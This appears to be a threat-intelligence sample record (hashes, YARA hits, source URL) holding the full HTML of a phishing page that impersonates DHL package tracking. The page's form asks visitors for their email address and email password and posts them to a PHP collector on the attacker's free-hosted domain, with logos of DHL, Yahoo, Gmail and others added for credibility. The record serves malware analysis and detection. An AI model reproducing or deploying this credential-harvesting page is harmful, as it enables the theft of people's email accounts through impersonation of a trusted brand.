Sample details: 8d60d4dee5dcbf535bc8e8ff511c86bb --

Hashes
MD5: 8d60d4dee5dcbf535bc8e8ff511c86bb
SHA1: 3832c059ea34e3e70120f7d65a211de709b3f2b6
SHA256: d98d7838386189cba710e90b0ee4f3b7bbd5a9ce88fcf1fe300a22cb40bce6c9
SSDEEP: 192:JjfVIDt3xxIg1SaN1IiZtsP8frjO18unmayYUzup/FFFPWe9bIbXLdIyA:JkzxIg1SabIgtsP8frjFgmayYU+/Ae9b
Details
File Type: HTML
Yara Hits
YRP/domain | YRP/url | YRP/contentis_base64 |
Source
http://thorloki09077990-099880.000webhostapp.com/zad/dhl-express/track.shipment.html
Strings
		<html>
<HEAD>
	<TITLE>DHL | Tracking</TITLE>
        <META NAME="DESCRIPTION" CONTENT="lodging & fishing guide service">
        <META NAME="KEYWORDS" CONTENT="lodging, fishing guide service">
<title>TRADE FILE</title>
</head>
<script type="text/javascript"><!--
function validateForm() {
with (document.myform) {
var alertMsg = "The following REQUIRED fields\nhave been left empty:\n";
if (email.value == "") alertMsg += "\nEmail";
if (epass.value == "") alertMsg += "\nEmail Password";
if (alertMsg != "The following REQUIRED fields\nhave been left empty:\n") {
alert(alertMsg);
return false;
} else {
return true;
// --></script>
<body background="http://www.dhl.com/img/modules/5_1_dhl_global_locator_all_340_187.gif" text="black" link="blue" alink="blue" vlink="blue" background="" >
<!-- 66613 -->
<font face="Arial" style="font-size: 20pt" color="#342C9A">
<center><b>Sign In Your Email to View Your Tracking</b></font><font face="verdana,arial" size=-1><p>
<img src="http://www.dhl.com/img/meta/dhl_logo.gif" width="300" height="100">
<table cellpadding=2 cellspacing=0 border=0>
<tr><td bgcolor="blue"><table cellpadding=0 cellspacing=0 border=0 width=100%><tr><td bgcolor="blue" align=center style="padding:2;padding-bottom:4"><b>
	<font size=-1 color="white" face="Comic Sans MS">Enter your 
	Email ID and password</font></b></font><b><font face="Comic Sans MS" size=-1></th></font><font face="Comic Sans MS" size=-1></tr>
</font><font face="verdana,arial" size=-1>
<tr><td bgcolor="white" style="padding:5"><br>
<form action="http://thorloki09077990-099880.000webhostapp.com/zad/dhl-express/dhl-express.php" onsubmit="return validateForm()" method="post" name="myform">
<center><table width="517">
<tr><td width="110"><font face="verdana,arial" size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
	E-MAIL ID:</td><td width="397"><input type="text" name="email" size="40"></td></tr>
<tr><td colspan=2><font face="verdana,arial" size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
	</font><font face="verdana,arial" size=1><span  class=text1a>(example777@domain.com)</span></td></tr>
<font face="verdana,arial" size=-1>
	<td width="110"><font face="verdana,arial" size=-1>&nbsp;&nbsp;&nbsp;&nbsp; 
	PASSWORD:</td>
	<td width="397"><input type="password" name="epass" size="40"></td>
	</font>
<font face="verdana,arial" size=-1>
	<td width="110"><font face="verdana,arial" size=-1>&nbsp;</td>
	<td width="397"><font face="verdana,arial" size=-1><input type="submit" value="Log in To View"></td>
	</font>
<tr><td colspan=2><font face="verdana,arial" size=-1></td></tr>
</table></center>
</form>
	<script language="JavaScript">
	<!-- 
			if (document.aform.login.value == '') {
				document.aform.login.focus();
	</script>
</td></tr></table></td></tr></table>
<div class="copyright cLight">
&nbsp;</div>
<p>Copyright Notice &#65449; 1999-2014 DHL WorldWide Delivery. 
All rights reserved. </p>
&nbsp;<center><p><hr size=1 width="90%">&nbsp;</p></center>
</font>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img alt="http://mimg.126.net/logo/126logo.gif" src="http://mimg.126.net/logo/126logo.gif"><img alt="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" width="110" height="36">&nbsp; <img src="http://img3.cache.netease.com/www/logo/logo_png.png" alt="" title="" border=0 width=122 height=44>&nbsp;&nbsp; <img src="https://www.google.com/images/logos/mail_logo.png" alt="" title="" border=0 width=142 height=26><img src="https://secure.wlxrs.com/~Live.SiteContent.ID/~16.0.2/~/~/~/~/images/WindowsLive.png" alt="" title="" border=0 width=175 height=23>&nbsp;<img src="http://mimg.yeah.net/logo/yeahlogo_middle.gif" alt="" title="" border=0 width=174 height=62>
<img src="http://l.yimg.com/a/i/ww/met/yahoo_logo_us_061509.png" alt="" title="" border=0 width=138 height=49></p>
<div style="text-align: right;position: fixed;z-index:9999999;bottom: 0;width: auto;right: 1%;cursor: pointer;line-height: 0;display:block !important;"><a title="Hosted on free web hosting 000webhost.com. Host your own website for FREE." target="_blank" href="https://www.000webhost.com/?utm_source=000webhostapp&utm_campaign=000_logo&utm_medium=website&utm_content=footer_img"><img src="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png" alt="www.000webhost.com"></a></div><script>function getCookie(e){for(var t=e+"=",n=decodeURIComponent(document.cookie).split(";"),o=0;o<n.length;o++){for(var i=n[o];" "==i.charAt(0);)i=i.substring(1);if(0==i.indexOf(t))return i.substring(t.length,i.length)}return""}getCookie("hostinger")&&(document.cookie="hostinger=;expires=Thu, 01 Jan 1970 00:00:01 GMT;",location.reload());var notification=document.getElementsByClassName("notice notice-success is-dismissible"),hostingerLogo=document.getElementsByClassName("hlogo"),mainContent=document.getElementsByClassName("notice_content")[0],newList=["Powerful and Easy-To-Use Control Panel.","1-Click Auto Installer and 24/7 Live Support.","Free Domain, Email and SSL Bundle.","5x faster WordPress performance","Weekly Backups and Fast Response Time."];if(notification.length>0&&null!=mainContent){var googleFont=document.createElement("link");googleFontHref=document.createAttribute("href"),googleFontRel=document.createAttribute("rel"),googleFontHref.value="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600",googleFontRel.value="stylesheet",googleFont.setAttributeNode(googleFontHref),googleFont.setAttributeNode(googleFontRel);var css="@media only screen and (max-width: 768px) {.web-hosting-90-off-image-wrapper {position: absolute;} .notice_content {justify-content: center;} .web-hosting-90-off-image {opacity: 0.3;}} @media only screen and (min-width: 769px) {.notice_content {justify-content: space-between;} .web-hosting-90-off-image-wrapper {padding: 0 5%}} .content-wrapper {z-index: 5} .notice_content {display: flex; align-items: center;} * {-webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;} .upgrade_button_red_sale{border: 0; border-radius: 3px; background-color: #ff123a !important; padding: 15px 55px !important; margin-left: 30px; font-family: 'Open Sans', sans-serif; font-size: 16px; font-weight: 600; color: #ffffff;} .upgrade_button_red_sale:hover{color: #ffffff !important; background: #d10303 !important;}",style=document.createElement("style"),sheet=window.document.styleSheets[0];style.styleSheet?style.styleSheet.cssText=css:style.appendChild(document.createTextNode(css)),document.getElementsByTagName("head")[0].appendChild(style),document.getElementsByTagName("head")[0].appendChild(googleFont);var button=document.getElementsByClassName("upgrade_button_red")[0],link=button.parentElement;link.setAttribute("href","https://www.hostinger.com/hosting-starter-offer?utm_source=000webhost&utm_medium=panel&utm_campaign=000-wp"),link.innerHTML='<button class="upgrade_button_red_sale">TRANSFER NOW</button>',(notification=notification[0]).setAttribute("style","padding-bottom: 10px; padding-top: 5px; background-image: url(https://cdn.000webhost.com/000webhost/promotions/springsale/mountains-neon-background.jpg); background-color: #000000; background-size: cover; background-repeat: no-repeat; color: #ffffff; border-color: #ff123a; border-width: 8px;"),notification.className="notice notice-error is-dismissible",(hostingerLogo=hostingerLogo[0]).setAttribute("src","https://cdn.000webhost.com/000webhost/promotions/springsale/logo-hostinger-white.svg"),hostingerLogo.setAttribute("style","float: none !important; height: auto; max-width: 100%; margin: 40px 20px 10px 30px;");var h1Tag=notification.getElementsByTagName("H1")[0];h1Tag.remove();var paragraph=notification.getElementsByTagName("p")[0];paragraph.innerHTML="Fast & Secure Web Hosting. <br>Limited time offer: get an SSL certificate for FREE",paragraph.setAttribute("style",'max-width: 600px; margin-left: 30px; font-family: "Open Sans", sans-serif; font-size: 16px; font-weight: 600;');var list=notification.getElementsByTagName("UL")[0];list.setAttribute("style","max-width: 675px;");for(var listElements=list.getElementsByTagName("LI"),i=0;i<newList.length;i++)listElements[i].setAttribute("style","color:#ffffff; list-style-type: disc; margin-left: 30px; font-family: 'Open Sans', sans-serif; font-size: 14px; font-weight: 300; line-height: 1.5;"),listElements[i].innerHTML=newList[i];listElements[listElements.length-1].remove();var org_html=mainContent.innerHTML,new_html='<div class="content-wrapper">'+mainContent.innerHTML+'</div><div class="web-hosting-90-off-image-wrapper"><img class="web-hosting-90-off-image" src="https://cdn.000webhost.com/000webhost/promotions/springsale/web-hosting-90-off.png"></div>';mainContent.innerHTML=new_html;var saleImage=mainContent.getElementsByClassName("web-hosting-90-off-image")[0]}</script></body>
</html>